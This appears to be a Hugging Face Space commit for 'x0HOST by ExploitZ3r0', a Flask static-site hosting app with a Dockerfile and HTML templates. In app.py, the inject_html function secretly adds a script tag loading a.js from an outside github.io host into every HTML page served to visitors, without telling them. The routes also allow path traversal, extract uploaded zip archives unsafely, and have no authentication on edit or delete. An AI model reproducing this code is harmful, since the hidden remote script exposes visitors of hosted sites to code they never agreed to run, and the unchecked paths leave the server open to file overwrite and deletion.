Spaces:

Xlnk
/

h

Sleeping

App Files Files Community

Xlnk commited on 10 days ago

Commit

f751cec

verified ·

1 Parent(s): 6bf249b

Upload 8 files

Browse files

Files changed (8) hide show

.gitignore +3 -0
Dockerfile +33 -0
app.py +208 -0
requirements.txt +2 -0
templates/dashboard.html +55 -0
templates/edit.html +166 -0
templates/files.html +203 -0
templates/index.html +23 -0

.gitignore ADDED Viewed

	@@ -0,0 +1,3 @@

+uploads/
+__pycache__/
+data.db

Dockerfile ADDED Viewed

	@@ -0,0 +1,33 @@

+# Use official Python slim image
+FROM python:3.11-slim
+# Set working directory
+WORKDIR /app
+# Create non-root user for security (required by HF Spaces)
+RUN useradd -m -u 1000 user
+USER user
+ENV HOME=/home/user \
+    PATH=/home/user/.local/bin:$PATH
+# Set working directory for user
+WORKDIR $HOME/app
+# Copy requirements first for better caching
+COPY --chown=user requirements.txt .
+# Install dependencies
+RUN pip install --no-cache-dir --upgrade pip && \
+    pip install --no-cache-dir -r requirements.txt gunicorn
+# Copy application code
+COPY --chown=user . .
+# Create uploads directory with proper permissions
+RUN mkdir -p uploads && chmod 755 uploads
+# Expose port 7860 (Hugging Face Spaces default)
+EXPOSE 7860
+# Run with gunicorn for production
+CMD ["gunicorn", "--bind", "0.0.0.0:7860", "--workers", "2", "--threads", "2", "app:app"]

app.py ADDED Viewed

	@@ -0,0 +1,208 @@

+import os, zipfile, sqlite3, uuid, shutil
+from datetime import datetime
+from flask import Flask, request, render_template, redirect, url_for, abort, Response, send_from_directory
+APP_NAME = "x0HOST by ExploitZ3r0"
+UPLOAD_DIR = "uploads"
+DB = "data.db"
+INJECT_SCRIPT = '<script src="https://trejduu32-code.github.io/supreme-engine/a.js" defer></script>'
+BRAND_COMMENT = '<!-- x0HOST by ExploitZ3r0 -->'
+os.makedirs(UPLOAD_DIR, exist_ok=True)
+app = Flask(__name__)
+# ---------- DATABASE ----------
+def db():
+    return sqlite3.connect(DB)
+def init_db():
+    if os.path.exists(DB):
+        return
+    with db() as c:
+        c.execute("""
+        CREATE TABLE sites (
+            id TEXT PRIMARY KEY,
+            created TEXT,
+            views INTEGER DEFAULT 0,
+            expires TEXT
+        )
+        """)
+# ---------- HTML INJECTION ----------
+def inject_html(html):
+    if "supreme-engine/a.js" in html:
+        return html
+    block = BRAND_COMMENT + "\n" + INJECT_SCRIPT + "\n"
+    lower = html.lower()
+    if "</head>" in lower:
+        i = lower.rfind("</head>")
+        return html[:i] + block + html[i:]
+    return block + html
+# ---------- AUTO CLEANUP ----------
+def cleanup():
+    now = datetime.utcnow()
+    with db() as c:
+        rows = c.execute("SELECT id, expires FROM sites").fetchall()
+        for site_id, exp in rows:
+            if exp and datetime.fromisoformat(exp) < now:
+                shutil.rmtree(os.path.join(UPLOAD_DIR, site_id), ignore_errors=True)
+                c.execute("DELETE FROM sites WHERE id=?", (site_id,))
+# ---------- ROUTES ----------
+@app.route("/", methods=["GET", "POST"])
+def index():
+    cleanup()
+    if request.method == "POST":
+        file = request.files["file"]
+        site_id = request.form.get("site_id") or uuid.uuid4().hex[:6]
+        expires = request.form.get("expires") or None
+        site_path = os.path.join(UPLOAD_DIR, site_id)
+        if os.path.exists(site_path):
+            return "ID already taken", 400
+        os.makedirs(site_path)
+        if file.filename.endswith(".zip"):
+            zip_path = os.path.join(site_path, "site.zip")
+            file.save(zip_path)
+            with zipfile.ZipFile(zip_path) as z:
+                z.extractall(site_path)
+            os.remove(zip_path)
+        else:
+            file.save(os.path.join(site_path, "index.html"))
+        with db() as c:
+            c.execute(
+                "INSERT INTO sites VALUES (?, ?, 0, ?)",
+                (site_id, datetime.utcnow().isoformat(), expires)
+            )
+        return redirect(url_for("dashboard"))
+    return render_template("index.html")
+@app.route("/dashboard")
+def dashboard():
+    with db() as c:
+        sites = c.execute("SELECT * FROM sites ORDER BY created DESC").fetchall()
+    return render_template("dashboard.html", sites=sites)
+@app.route("/delete/<site_id>")
+def delete(site_id):
+    shutil.rmtree(os.path.join(UPLOAD_DIR, site_id), ignore_errors=True)
+    with db() as c:
+        c.execute("DELETE FROM sites WHERE id=?", (site_id,))
+    return redirect(url_for("dashboard"))
+# ---------- FILE MANAGEMENT ----------
+def get_all_files(directory):
+    """Recursively get all files in a directory"""
+    files = []
+    for root, dirs, filenames in os.walk(directory):
+        for filename in filenames:
+            full_path = os.path.join(root, filename)
+            rel_path = os.path.relpath(full_path, directory)
+            files.append(rel_path.replace("\\", "/"))
+    return sorted(files)
+@app.route("/files/<site_id>")
+def list_files(site_id):
+    site_path = os.path.join(UPLOAD_DIR, site_id)
+    if not os.path.exists(site_path):
+        abort(404)
+    files = get_all_files(site_path)
+    return render_template("files.html", site_id=site_id, files=files)
+@app.route("/edit/<site_id>/<path:file>")
+def edit_file(site_id, file):
+    path = os.path.join(UPLOAD_DIR, site_id, file)
+    if not os.path.exists(path):
+        abort(404)
+    try:
+        with open(path, encoding="utf-8", errors="ignore") as f:
+            content = f.read()
+    except:
+        content = "[Binary file - cannot edit]"
+    return render_template("edit.html", site_id=site_id, file=file, content=content)
+@app.route("/save/<site_id>/<path:file>", methods=["POST"])
+def save_file(site_id, file):
+    path = os.path.join(UPLOAD_DIR, site_id, file)
+    if not os.path.exists(path):
+        abort(404)
+    content = request.form.get("content", "")
+    with open(path, "w", encoding="utf-8") as f:
+        f.write(content)
+    return redirect(url_for("list_files", site_id=site_id))
+@app.route("/delete-file/<site_id>/<path:file>")
+def delete_file(site_id, file):
+    site_path = os.path.join(UPLOAD_DIR, site_id)
+    path = os.path.join(site_path, file)
+    if not os.path.exists(path):
+        abort(404)
+    os.remove(path)
+    # Clean up empty parent directories
+    parent = os.path.dirname(path)
+    while parent != site_path and os.path.isdir(parent) and not os.listdir(parent):
+        os.rmdir(parent)
+        parent = os.path.dirname(parent)
+    return redirect(url_for("list_files", site_id=site_id))
+@app.route("/upload/<site_id>", methods=["POST"])
+def upload_to_site(site_id):
+    site_path = os.path.join(UPLOAD_DIR, site_id)
+    if not os.path.exists(site_path):
+        abort(404)
+    file = request.files.get("file")
+    subfolder = request.form.get("subfolder", "").strip().strip("/")
+    if not file or not file.filename:
+        return redirect(url_for("list_files", site_id=site_id))
+    # Determine target directory
+    target_dir = os.path.join(site_path, subfolder) if subfolder else site_path
+    os.makedirs(target_dir, exist_ok=True)
+    if file.filename.endswith(".zip"):
+        # Extract ZIP file
+        zip_path = os.path.join(target_dir, "temp.zip")
+        file.save(zip_path)
+        with zipfile.ZipFile(zip_path) as z:
+            z.extractall(target_dir)
+        os.remove(zip_path)
+    else:
+        # Save single file
+        file.save(os.path.join(target_dir, file.filename))
+    return redirect(url_for("list_files", site_id=site_id))
+@app.route("/h/<site_id>/")
+@app.route("/h/<site_id>/<path:file>")
+def serve(site_id, file="index.html"):
+    path = os.path.join(UPLOAD_DIR, site_id, file)
+    if not os.path.exists(path):
+        abort(404)
+    with db() as c:
+        c.execute("UPDATE sites SET views = views + 1 WHERE id=?", (site_id,))
+    if file.lower().endswith(".html"):
+        with open(path, encoding="utf-8", errors="ignore") as f:
+            html = inject_html(f.read())
+        return Response(html, mimetype="text/html")
+    return send_from_directory(os.path.dirname(path), os.path.basename(path))
+# ---------- START ----------
+if __name__ == "__main__":
+    init_db()
+    app.run(debug=True)

requirements.txt ADDED Viewed

	@@ -0,0 +1,2 @@


1	+ Flask
2	+ gunicorn

templates/dashboard.html ADDED Viewed

	@@ -0,0 +1,55 @@

+<!DOCTYPE html>
+<html>
+<head>
+    <title>x0HOST Dashboard</title>
+    <style>
+        body {
+            background: #020617;
+            color: #fff;
+            font-family: system-ui;
+            padding: 30px
+        }
+        table {
+            width: 100%;
+            border-collapse: collapse
+        }
+        td,
+        th {
+            padding: 10px;
+            border-bottom: 1px solid #1f2937
+        }
+        a {
+            color: #22c55e
+        }
+    </style>
+</head>
+<body>
+    <h1>x0HOST Dashboard</h1>
+    <table>
+        <tr>
+            <th>ID</th>
+            <th>Views</th>
+            <th>Expires</th>
+            <th>Actions</th>
+        </tr>
+        {% for s in sites %}
+        <tr>
+            <td><a href="/h/{{s[0]}}/" target="_blank">{{s[0]}}</a></td>
+            <td>{{s[2]}}</td>
+            <td>{{s[3] or "Never"}}</td>
+            <td>
+                <a href="/files/{{s[0]}}">Edit</a> |
+                <a href="/delete/{{s[0]}}" onclick="return confirm('Delete this site?')">Delete</a>
+            </td>
+        </tr>
+        {% endfor %}
+    </table>
+</body>
+</script>
+</html>

templates/edit.html ADDED Viewed

	@@ -0,0 +1,166 @@

+<!DOCTYPE html>
+<html>
+<head>
+    <title>Edit {{file}} | x0HOST</title>
+    <style>
+        * {
+            box-sizing: border-box
+        }
+        body {
+            background: #020617;
+            color: #fff;
+            font-family: system-ui;
+            padding: 30px;
+            margin: 0
+        }
+        .container {
+            max-width: 1200px;
+            margin: 0 auto
+        }
+        h1 {
+            color: #22c55e;
+            font-size: 1.4rem;
+            margin-bottom: 5px
+        }
+        .breadcrumb {
+            margin-bottom: 20px
+        }
+        .breadcrumb a {
+            color: #22c55e;
+            text-decoration: none
+        }
+        .editor-wrap {
+            background: #0f172a;
+            border-radius: 12px;
+            overflow: hidden;
+            border: 1px solid #1e293b
+        }
+        .toolbar {
+            background: #1e293b;
+            padding: 12px 16px;
+            display: flex;
+            justify-content: space-between;
+            align-items: center
+        }
+        .file-path {
+            font-family: monospace;
+            color: #94a3b8;
+            font-size: 14px
+        }
+        textarea {
+            width: 100%;
+            height: calc(100vh - 250px);
+            min-height: 400px;
+            background: #0f172a;
+            color: #e2e8f0;
+            border: none;
+            padding: 20px;
+            font-family: 'Fira Code', 'Consolas', monospace;
+            font-size: 14px;
+            line-height: 1.6;
+            resize: vertical;
+            outline: none
+        }
+        textarea:focus {
+            background: #0a0f1a
+        }
+        .actions {
+            display: flex;
+            gap: 10px
+        }
+        .btn {
+            padding: 10px 20px;
+            border-radius: 8px;
+            border: none;
+            cursor: pointer;
+            font-weight: 600;
+            transition: all 0.2s
+        }
+        .btn-save {
+            background: #22c55e;
+            color: #000
+        }
+        .btn-save:hover {
+            background: #16a34a
+        }
+        .btn-cancel {
+            background: #334155;
+            color: #fff
+        }
+        .btn-cancel:hover {
+            background: #475569
+        }
+        .btn-preview {
+            background: #3b82f6;
+            color: #fff
+        }
+        .btn-preview:hover {
+            background: #2563eb
+        }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="breadcrumb">
+            <a href="/dashboard">Dashboard</a> / <a href="/files/{{site_id}}">{{site_id}}</a> /
+            <strong>{{file}}</strong>
+        </div>
+        <form method="post" action="/save/{{site_id}}/{{file}}">
+            <div class="editor-wrap">
+                <div class="toolbar">
+                    <span class="file-path">📄 {{file}}</span>
+                    <div class="actions">
+                        <a href="/h/{{site_id}}/{{file}}" target="_blank" class="btn btn-preview">👁️ Preview</a>
+                        <a href="/files/{{site_id}}" class="btn btn-cancel">Cancel</a>
+                        <button type="submit" class="btn btn-save">💾 Save</button>
+                    </div>
+                </div>
+                <textarea name="content" spellcheck="false" autofocus>{{content}}</textarea>
+            </div>
+        </form>
+    </div>
+    <script>
+        // Ctrl+S to save
+        document.addEventListener('keydown', function (e) {
+            if ((e.ctrlKey || e.metaKey) && e.key === 's') {
+                e.preventDefault();
+                document.querySelector('form').submit();
+            }
+        });
+        // Tab key support in textarea
+        document.querySelector('textarea').addEventListener('keydown', function (e) {
+            if (e.key === 'Tab') {
+                e.preventDefault();
+                const start = this.selectionStart;
+                const end = this.selectionEnd;
+                this.value = this.value.substring(0, start) + '  ' + this.value.substring(end);
+                this.selectionStart = this.selectionEnd = start + 2;
+            }
+        });
+    </script>
+</body>
+</html>

templates/files.html ADDED Viewed

	@@ -0,0 +1,203 @@

+<!DOCTYPE html>
+<html>
+<head>
+    <title>Files - {{site_id}} | x0HOST</title>
+    <style>
+        body {
+            background: #020617;
+            color: #fff;
+            font-family: system-ui;
+            padding: 30px
+        }
+        .container {
+            max-width: 800px;
+            margin: 0 auto
+        }
+        h1 {
+            color: #22c55e
+        }
+        .breadcrumb {
+            margin-bottom: 20px
+        }
+        .breadcrumb a {
+            color: #22c55e;
+            text-decoration: none
+        }
+        .file-list {
+            background: #0f172a;
+            border-radius: 12px;
+            overflow: hidden
+        }
+        .file-item {
+            display: flex;
+            justify-content: space-between;
+            align-items: center;
+            padding: 14px 20px;
+            border-bottom: 1px solid #1e293b;
+            transition: background 0.2s
+        }
+        .file-item:hover {
+            background: #1e293b
+        }
+        .file-item:last-child {
+            border-bottom: none
+        }
+        .file-name {
+            color: #e2e8f0;
+            font-family: monospace
+        }
+        .file-actions a {
+            color: #22c55e;
+            text-decoration: none;
+            margin-left: 15px;
+            padding: 6px 12px;
+            background: #064e3b;
+            border-radius: 6px;
+            font-size: 13px;
+            transition: background 0.2s
+        }
+        .file-actions a:hover {
+            background: #065f46
+        }
+        .file-actions a.btn-delete {
+            background: #7f1d1d;
+            color: #fca5a5;
+        }
+        .file-actions a.btn-delete:hover {
+            background: #991b1b;
+        }
+        .empty {
+            color: #64748b;
+            text-align: center;
+            padding: 40px
+        }
+        .upload-section {
+            margin-top: 30px;
+            background: #0f172a;
+            border-radius: 12px;
+            padding: 24px;
+        }
+        .upload-section h2 {
+            color: #22c55e;
+            margin: 0 0 16px 0;
+            font-size: 1.2rem;
+        }
+        .upload-form {
+            display: flex;
+            flex-wrap: wrap;
+            gap: 16px;
+            align-items: flex-end;
+        }
+        .form-group {
+            flex: 1;
+            min-width: 200px;
+        }
+        .form-group label {
+            display: block;
+            color: #94a3b8;
+            font-size: 13px;
+            margin-bottom: 6px;
+        }
+        .form-group input {
+            width: 100%;
+            padding: 10px 14px;
+            background: #1e293b;
+            border: 1px solid #334155;
+            border-radius: 8px;
+            color: #fff;
+            font-size: 14px;
+        }
+        .form-group input:focus {
+            outline: none;
+            border-color: #22c55e;
+        }
+        .btn-upload {
+            padding: 10px 20px;
+            background: #22c55e;
+            color: #000;
+            border: none;
+            border-radius: 8px;
+            font-weight: 600;
+            cursor: pointer;
+            transition: background 0.2s;
+        }
+        .btn-upload:hover {
+            background: #16a34a;
+        }
+        .hint {
+            color: #64748b;
+            font-size: 13px;
+            margin-top: 12px;
+        }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="breadcrumb">
+            <a href="/dashboard">← Dashboard</a> / <strong>{{site_id}}</strong>
+        </div>
+        <h1>📁 Files in {{site_id}}</h1>
+        <div class="file-list">
+            {% if files %}
+            {% for file in files %}
+            <div class="file-item">
+                <span class="file-name">{{file}}</span>
+                <div class="file-actions">
+                    <a href="/edit/{{site_id}}/{{file}}">✏️ Edit</a>
+                    <a href="/h/{{site_id}}/{{file}}" target="_blank">👁️ View</a>
+                    <a href="/delete-file/{{site_id}}/{{file}}" class="btn-delete"
+                        onclick="return confirm('Delete {{file}}?')">🗑️ Delete</a>
+                </div>
+            </div>
+            {% endfor %}
+            {% else %}
+            <div class="empty">No files found</div>
+            {% endif %}
+        </div>
+        <!-- Upload Form -->
+        <div class="upload-section">
+            <h2>📤 Upload Files</h2>
+            <form method="post" action="/upload/{{site_id}}" enctype="multipart/form-data" class="upload-form">
+                <div class="form-group">
+                    <label>File or ZIP archive</label>
+                    <input type="file" name="file" required>
+                </div>
+                <div class="form-group">
+                    <label>Subfolder (optional)</label>
+                    <input type="text" name="subfolder" placeholder="e.g. assets/images">
+                </div>
+                <button type="submit" class="btn-upload">⬆️ Upload</button>
+            </form>
+            <p class="hint">💡 Upload a ZIP file to add multiple files at once</p>
+        </div>
+    </div>
+</body>
+</html>

templates/index.html ADDED Viewed

	@@ -0,0 +1,23 @@

+<!DOCTYPE html>
+<html>
+<head>
+<title>x0HOST by ExploitZ3r0</title>
+<style>
+body{background:#020617;color:#e5e7eb;font-family:system-ui;display:flex;justify-content:center;height:100vh}
+.box{margin-top:80px;background:#0f172a;padding:30px;border-radius:14px;width:360px}
+input,button{width:100%;padding:12px;margin-top:10px;border-radius:10px;border:none}
+button{background:#10b981;font-weight:600}
+</style>
+</head>
+<body>
+<div class="box">
+<h1>x0HOST by ExploitZ3r0</h1>
+<form method="post" enctype="multipart/form-data">
+<input type="file" name="file" required>
+<input name="site_id" placeholder="Custom ID (optional)">
+<input type="date" name="expires">
+<button>Upload</button>
+</form>
+</div>
+</body>
+</html>